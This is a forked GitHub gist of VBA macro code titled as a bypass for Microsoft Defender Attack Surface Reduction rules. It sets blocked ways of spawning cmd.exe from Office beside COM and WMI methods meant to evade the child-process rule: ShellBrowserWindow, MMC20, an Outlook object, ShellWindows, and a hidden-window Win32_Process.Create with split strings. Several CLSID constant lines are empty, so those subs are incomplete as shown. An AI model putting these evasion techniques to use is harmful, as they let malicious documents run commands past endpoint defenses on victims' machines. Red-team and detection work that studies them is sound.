Skip to content

Instantly share code, notes, and snippets.

Forked from infosecn1nja/ASR Rules Bypass.vba
Created September 16, 2019 22:30
Show Gist options
  • Save TechByTom/e22a89dabbc511a321de4ae7d06831c5 to your computer and use it in GitHub Desktop.
Save TechByTom/e22a89dabbc511a321de4ae7d06831c5 to your computer and use it in GitHub Desktop.
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
Sub ASR_blocked2()
Dim WSHShell As Object
Set WSHShell = CreateObject("Shell.Application")
WSHShell.ShellExecute "cmd.exe"
End Sub
Sub ASR_blocked3()
Call Shell("cmd.exe", 1)
End Sub
Sub ASR_blocked4()
Set WshShell = CreateObject("WScript.Shell")
Set WshShellExec = WshShell.Exec("cmd.exe")
End Sub
Sub ASR_blocked5()
Set obj = CreateObject("Excel.Application")
obj.DisplayAlerts = False
obj.DDEInitiate "cmd", "/c notepad.exe"
End Sub
Sub ASR_bypass_create_child_process_rule()
Const ShellBrowserWindow = _
Set SBW = GetObject("new:" & ShellBrowserWindow)
SBW.Document.Application.ShellExecute "cmd.exe", Null, "C:\Windows\System32", Null, 0
End Sub
Sub ASR_bypass_create_child_process_rule2()
Const ExecuteShellCommand = _
Set MMC20 = GetObject("new:" & ExecuteShellCommand)
MMC20.Document.ActiveView.ExecuteShellCommand ("cmd.exe")
End Sub
Sub ASR_bypass_create_child_process_rule3()
Const OUTLOOK = _
Set objShell = GetObject("new:" & OUTLOOK)
objShell.CreateObject("WScript.Shell").Run "cmd.exe", 0
End Sub
Sub ASR_bypass_create_child_process_rule4()
Const ShellWindows = _
Set SW = GetObject("new:" & ShellWindows).Item()
SW.Document.Application.ShellExecute "cmd.exe", Null, "C:\Windows\System32", Null, 0
End Sub
Sub ASR_bypass_create_child_process_rule5()
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe", Null, objConfig, intProcessID
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment